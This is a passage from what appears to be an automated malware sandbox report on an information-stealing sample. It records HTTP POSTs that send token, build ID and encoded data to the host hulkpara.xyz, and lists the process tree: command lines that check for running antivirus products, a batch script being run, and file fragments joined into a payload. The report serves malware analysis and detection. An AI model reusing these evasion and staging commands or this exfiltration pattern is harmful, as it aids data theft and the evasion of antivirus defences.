                                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:14:12 GMT
                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          42192.168.2.74986394.130.191.1684437416C:\Users\user\AppData\Local\Temp\325114\Miniature.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:14 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----ZCJMOPPPH4EUAIEK6PHL
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: hulkpara.xyz
                                                                                                                                                                                                                                                                                          Content-Length: 98329
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:14 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 5a 43 4a 4d 4f 50 50 50 48 34 45 55 41 49 45 4b 36 50 48 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 32 34 63 61 32 36 61 66 31 64 63 32 32 39 39 33 37 65 36 33 39 36 66 32 31 32 62 37 31 64 0d 0a 2d 2d 2d 2d 2d 2d 5a 43 4a 4d 4f 50 50 50 48 34 45 55 41 49 45 4b 36 50 48 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 5a 43 4a 4d 4f 50 50 50 48 34 45 55 41 49 45 4b 36 50 48 4c 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------ZCJMOPPPH4EUAIEK6PHLContent-Disposition: form-data; name="token"cf24ca26af1dc229937e6396f212b71d------ZCJMOPPPH4EUAIEK6PHLContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------ZCJMOPPPH4EUAIEK6PHLCont
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:14 UTC16355OUTData Raw: 55 55 55 55 41 46 46 46 46 41 42 53 55 74 46 41 43 55 55 55 55 41 46 4a 53 30 55 41 4a 52 52 52 51 41 55 6c 4c 52 51 41 6c 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 42 6f 6f 4e 41 43 55 55 55 55 41 46 46 46 46 41 43 55 55 74 4a 51 41 6c 46 4c 52 51 41 6c 46 46 46 41 42 52 52 52 51 41 6c 46 46 46 41 42 52 52 52 51 41 6c 46 46 46 41 42 52 52 52 51 41 6c 46 46 46 41 42 53 47 6c 70 44 51 41 55 55 55 55 41 46 4a 53 30 6c 41 42 51 61 4b 4b 41 45 6f 70 61 53 67 41 6f 6f 6f 6f 41 4b 53 6c 6f 6f 41 53 69 69 69 67 42 4b 4b 57 6b 6f 41 4b 4b 4b 4b 41 45 6f 6f 6f 6f 41 4b 53 6c 70 4b 41 43 6b 70 61 53 67 41 6f 6f 6f 6f 41 31 36 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 53 76 4d 66 69 55 76 38 41 59 2f 69 7a 77 78 34 6d 58 68 49 70 78 62 7a 74 2f 73 35 7a 2f
                                                                                                                                                                                                                                                                                          Data Ascii: UUUUAFFFFABSUtFACUUUUAFJS0UAJRRRQAUlLRQAlFFFABRRRQAUUUUAFBooNACUUUUAFFFFACUUtJQAlFLRQAlFFFABRRRQAlFFFABRRRQAlFFFABRRRQAlFFFABSGlpDQAUUUUAFJS0lABQaKKAEopaSgAooooAKSlooASiiigBKKWkoAKKKKAEooooAKSlpKACkpaSgAooooA16KKKACiiigAooooASvMfiUv8AY/izwx4mXhIpxbzt/s5z/
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:14 UTC16355OUTData Raw: 58 74 35 66 52 74 48 6d 5a 34 57 4f 6c 7a 56 62 64 69 56 66 61 70 56 2b 74 51 67 31 49 44 58 71 4a 48 46 59 6e 55 38 31 4b 6f 79 61 69 58 72 55 79 34 37 35 6f 73 5a 76 79 46 78 6e 33 71 49 75 38 54 5a 51 6b 56 30 57 6c 65 48 70 62 77 43 57 34 4a 53 49 39 42 33 4e 64 52 44 34 61 30 6c 49 67 72 57 6f 6b 39 53 35 35 72 68 72 59 36 6c 42 38 75 35 32 55 73 42 55 71 4b 37 30 4f 4a 73 72 78 5a 78 74 59 34 63 56 63 48 31 72 62 31 48 77 66 61 4d 50 4f 73 43 59 5a 6c 35 41 37 47 73 44 4d 6b 55 6a 52 54 4c 74 6b 55 34 59 56 35 39 53 74 43 57 73 54 48 45 59 57 56 46 33 65 78 4d 4b 73 78 4e 7a 56 51 4e 79 4b 6d 6a 50 4e 65 64 56 6c 71 63 36 4e 69 32 63 35 46 62 31 72 4a 6c 4b 35 6d 32 62 70 57 37 5a 53 56 77 54 33 4c 6a 6f 58 37 75 50 7a 37 4f 52 44 32 55 6b 66 57 75
                                                                                                                                                                                                                                                                                          Data Ascii: Xt5fRtHmZ4WOlzVbdiVfapV+tQg1IDXqJHFYnU81KoyaiXrUy475osZvyFxn3qIu8TZQkV0WleHpbwCW4JSI9B3NdRD4a0lIgrWok9S55rhrY6lB8u52UsBUqK70OJsrxZxtY4cVcH1rb1HwfaMPOsCYZl5A7GsDMkUjRTLtkU4YV59StCWsTHEYWVF3exMKsxNzVQNyKmjPNedVlqc6Ni2c5Fb1rJlK5m2bpW7ZSVwT3LjoX7uPz7ORD2UkfWu
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:14 UTC16355OUTData Raw: 4c 77 73 59 6a 79 55 75 4a 6c 7a 39 4a 47 72 71 5a 66 38 41 56 50 37 71 66 35 56 7a 50 77 2f 50 2f 45 69 6e 2f 77 43 76 79 66 38 41 39 47 4e 51 42 31 66 57 69 6c 48 53 69 67 42 4b 4b 4b 4b 41 43 6b 6f 70 61 41 45 78 53 55 74 4c 51 41 32 6b 7a 54 73 55 6d 4b 41 4f 48 31 35 64 33 6a 37 54 51 41 54 2b 37 42 50 48 75 61 36 31 77 32 7a 39 32 71 37 6a 30 7a 58 4f 61 68 6b 66 45 4b 7a 32 70 76 50 32 5a 75 50 7a 72 6f 50 4e 75 63 38 32 35 78 37 4d 4b 74 45 4d 57 52 6c 69 69 33 4f 42 6e 67 48 61 4b 52 49 59 34 77 46 7a 79 54 6e 6b 30 65 5a 50 2f 77 41 2b 72 66 38 41 66 61 31 45 42 4f 58 4c 79 51 4d 78 42 79 76 7a 44 69 71 4a 4c 47 7a 50 51 44 30 36 30 30 49 33 6e 4e 6b 4c 73 2f 68 48 70 51 5a 4a 2b 76 32 5a 76 2b 2b 68 52 35 73 2f 48 2b 6a 4e 7a 2f 74 69 67 43 4e
                                                                                                                                                                                                                                                                                          Data Ascii: LwsYjyUuJlz9JGrqZf8AVP7qf5VzPw/P/Ein/wCvyf8A9GNQB1fWilHSigBKKKKACkopaAExSUtLQA2kzTsUmKAOH15d3j7TQAT+7BPHua61w2z92q7j0zXOahkfEKz2pvP2ZuPzroPNuc825x7MKtEMWRlii3OBngHaKRIY4wFzyTnk0eZP/wA+rf8Afa1EBOXLyQMxByvzDiqJLGzPQD0600I3nNkLs/hHpQZJ+v2Zv++hR5s/H+jNz/tigCN
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:14 UTC16355OUTData Raw: 70 78 64 6d 6d 4e 53 6c 73 39 6a 48 62 56 72 39 4a 4d 4e 5a 6c 6c 55 34 4f 31 54 79 66 38 4d 59 71 5a 74 59 6d 55 74 2f 6f 45 70 41 58 63 4d 44 72 57 76 67 65 67 78 52 67 65 67 34 36 56 73 68 47 44 4c 72 56 32 34 68 4d 46 6c 49 43 78 47 34 4d 4f 67 72 63 58 4a 55 45 39 78 54 73 44 47 4f 50 79 6f 41 34 70 67 4a 53 5a 70 39 4a 69 67 44 6b 37 67 2f 38 58 4c 73 76 2b 76 52 76 36 31 31 31 63 66 65 6e 62 38 53 62 48 2f 72 30 62 2b 74 64 50 35 68 39 61 41 4c 4f 52 54 66 78 71 44 7a 50 65 6b 33 6d 67 43 63 39 61 53 6f 64 35 6f 38 77 30 41 53 45 6d 6d 6d 6f 7a 49 61 54 64 51 41 2b 6b 4a 46 4d 4a 4e 4d 4c 55 41 50 4c 55 77 6d 6d 46 36 4e 31 41 44 73 30 30 6d 6d 6c 71 61 57 6f 41 63 54 54 53 61 61 54 52 6e 69 67 42 63 30 32 6b 7a 53 5a 6f 41 55 6d 6d 35 70 43 61 54
                                                                                                                                                                                                                                                                                          Data Ascii: pxdmmNSls9jHbVr9JMNZllU4O1Tyf8MYqZtYmUt/oEpAXcMDrWvgegxRgeg46VshGDLrV24hMFlICxG4MOgrcXJUE9xTsDGOPyoA4pgJSZp9JigDk7g/8XLsv+vRv6111cfenb8SbH/r0b+tdP5h9aALORTfxqDzPek3mgCc9aSod5o8w0ASEmmmozIaTdQA+kJFMJNMLUAPLUwmmF6N1ADs00mmlqaWoAcTTSaaTRnigBc02kzSZoAUmm5pCaT
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:14 UTC16355OUTData Raw: 62 49 78 42 4f 4e 78 50 4a 78 6e 6a 50 51 64 4b 35 71 34 73 45 66 79 78 4e 6f 31 33 4a 72 69 36 74 48 4a 4c 64 69 31 63 35 69 2b 30 41 67 2b 62 6a 42 51 4a 74 2b 58 4a 78 6a 6f 4e 75 51 66 61 53 44 70 63 39 45 71 43 30 76 49 4c 36 45 7a 57 30 6d 2b 4d 4f 38 5a 4f 43 50 6d 56 69 72 44 6e 30 49 49 72 68 6c 74 35 70 2f 47 46 6e 64 4a 70 51 67 6b 2b 33 53 72 63 46 64 4e 6c 44 6d 50 5a 49 75 58 75 53 64 72 71 33 79 6b 4b 42 67 5a 55 5a 34 35 62 46 59 57 2b 6e 36 4a 4c 59 4c 6f 4b 4b 57 31 47 58 37 51 58 30 75 53 61 4e 55 33 79 4e 47 78 6a 51 44 7a 6c 78 74 41 77 53 46 79 44 78 6a 46 48 53 34 33 76 62 2b 75 76 38 41 6b 65 68 55 56 7a 2f 67 75 47 65 33 38 4f 72 44 50 45 30 57 79 34 6e 38 74 47 68 61 45 42 50 4d 59 72 68 47 4a 4b 72 6a 47 42 6b 34 47 4b 36 43 68
                                                                                                                                                                                                                                                                                          Data Ascii: bIxBONxPJxnjPQdK5q4sEfyxNo13Jri6tHJLdi1c5i+0Ag+bjBQJt+XJxjoNuQfaSDpc9EqC0vIL6EzW0m+MO8ZOCPmVirDn0IIrhlt5p/GFndJpQgk+3SrcFdNlDmPZIuXuSdrq3ykKBgZUZ45bFYW+n6JLYLoKKW1GX7QX0uSaNU3yNGxjQDzlxtAwSFyDxjFHS43vb+uv8AkehUVz/guGe38OrDPE0Wy4n8tGhaEBPMYrhGJKrjGBk4GK6Ch
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:14 UTC199OUTData Raw: 62 79 76 44 4e 45 34 65 4f 53 4e 69 72 49 77 4f 51 51 52 79 43 44 33 72 70 62 48 78 35 71 75 58 67 31 2b 57 66 78 42 70 30 67 47 2b 7a 31 43 35 64 77 47 48 33 57 52 69 53 55 59 48 75 4f 6f 4a 42 36 31 79 31 46 46 67 4f 67 31 44 78 76 34 6c 31 48 7a 34 35 4e 61 76 59 72 57 5a 54 47 62 4f 33 6e 65 4f 33 57 4d 6a 48 6c 72 47 44 74 43 34 34 78 6a 70 58 50 30 55 55 77 43 72 6b 6e 2f 41 43 42 62 58 2f 72 34 6d 2f 38 41 51 59 36 70 31 63 6b 2f 35 41 74 72 2f 77 42 66 45 33 2f 6f 4d 64 41 48 2f 39 6b 3d 0d 0a 2d 2d 2d 2d 2d 2d 5a 43 4a 4d 4f 50 50 50 48 34 45 55 41 49 45 4b 36 50 48 4c 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: byvDNE4eOSNirIwOQQRyCD3rpbHx5quXg1+WfxBp0gG+z1C5dwGH3WRiSUYHuOoJB61y1FFgOg1Dxv4l1Hz45NavYrWZTGbO3neO3WMjHlrGDtC44xjpXP0UUwCrkn/ACBbX/r4m/8AQY6p1ck/5Atr/wBfE3/oMdAH/9k=------ZCJMOPPPH4EUAIEK6PHL--
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:15 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:14:15 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:15 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          43192.168.2.74986594.130.191.1684437416C:\Users\user\AppData\Local\Temp\325114\Miniature.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:17 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----JWTR1VSJEKF37YUA168G
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: hulkpara.xyz
                                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:17 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 57 54 52 31 56 53 4a 45 4b 46 33 37 59 55 41 31 36 38 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 32 34 63 61 32 36 61 66 31 64 63 32 32 39 39 33 37 65 36 33 39 36 66 32 31 32 62 37 31 64 0d 0a 2d 2d 2d 2d 2d 2d 4a 57 54 52 31 56 53 4a 45 4b 46 33 37 59 55 41 31 36 38 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 4a 57 54 52 31 56 53 4a 45 4b 46 33 37 59 55 41 31 36 38 47 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------JWTR1VSJEKF37YUA168GContent-Disposition: form-data; name="token"cf24ca26af1dc229937e6396f212b71d------JWTR1VSJEKF37YUA168GContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------JWTR1VSJEKF37YUA168GCont
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:18 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:14:18 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          44192.168.2.74986894.130.191.1684437416C:\Users\user\AppData\Local\Temp\325114\Miniature.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:19 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----2DTJEUS2DTRQQIMOZMYM
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: hulkpara.xyz
                                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:19 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 32 44 54 4a 45 55 53 32 44 54 52 51 51 49 4d 4f 5a 4d 59 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 32 34 63 61 32 36 61 66 31 64 63 32 32 39 39 33 37 65 36 33 39 36 66 32 31 32 62 37 31 64 0d 0a 2d 2d 2d 2d 2d 2d 32 44 54 4a 45 55 53 32 44 54 52 51 51 49 4d 4f 5a 4d 59 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 32 44 54 4a 45 55 53 32 44 54 52 51 51 49 4d 4f 5a 4d 59 4d 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------2DTJEUS2DTRQQIMOZMYMContent-Disposition: form-data; name="token"cf24ca26af1dc229937e6396f212b71d------2DTJEUS2DTRQQIMOZMYMContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------2DTJEUS2DTRQQIMOZMYMCont
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:20 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:14:20 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                          Statistics

                                                                                                                                                                                                                                                                                          CPU Usage

                                                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                                                          Memory Usage

                                                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                          Behavior

                                                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                                                          System Behavior

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                                                                                          Start time:02:12:51
                                                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\pM3fQBuTLy.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\pM3fQBuTLy.exe"
                                                                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                                                                          File size:899'095 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:C5F715F9EEFA5E42FD10FC3B6E90953B
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                                                                                                                          Start time:02:12:52
                                                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c copy Cotton Cotton.cmd & Cotton.cmd
                                                                                                                                                                                                                                                                                          Imagebase:0x410000
                                                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                                                                                                                          Start time:02:12:52
                                                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:8
                                                                                                                                                                                                                                                                                          Start time:02:12:55
                                                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline:tasklist
                                                                                                                                                                                                                                                                                          Imagebase:0xbc0000
                                                                                                                                                                                                                                                                                          File size:79'360 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:9
                                                                                                                                                                                                                                                                                          Start time:02:12:55
                                                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline:findstr /I "opssvc wrsa"
                                                                                                                                                                                                                                                                                          Imagebase:0x3c0000
                                                                                                                                                                                                                                                                                          File size:29'696 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:11
                                                                                                                                                                                                                                                                                          Start time:02:12:56
                                                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline:tasklist
                                                                                                                                                                                                                                                                                          Imagebase:0xbc0000
                                                                                                                                                                                                                                                                                          File size:79'360 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:12
                                                                                                                                                                                                                                                                                          Start time:02:12:56
                                                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                                                                                                                                                                          Imagebase:0x3c0000
                                                                                                                                                                                                                                                                                          File size:29'696 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:13
                                                                                                                                                                                                                                                                                          Start time:02:12:57
                                                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline:cmd /c md 325114
                                                                                                                                                                                                                                                                                          Imagebase:0x410000
                                                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:14
                                                                                                                                                                                                                                                                                          Start time:02:12:57
                                                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline:findstr /V "Grocery" Pink
                                                                                                                                                                                                                                                                                          Imagebase:0x3c0000
                                                                                                                                                                                                                                                                                          File size:29'696 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:15
                                                                                                                                                                                                                                                                                          Start time:02:12:57
                                                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline:cmd /c copy /b ..\Through + ..\Aspects + ..\Except + ..\Prevention d
                                                                                                                                                                                                                                                                                          Imagebase:0x410000
                                                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
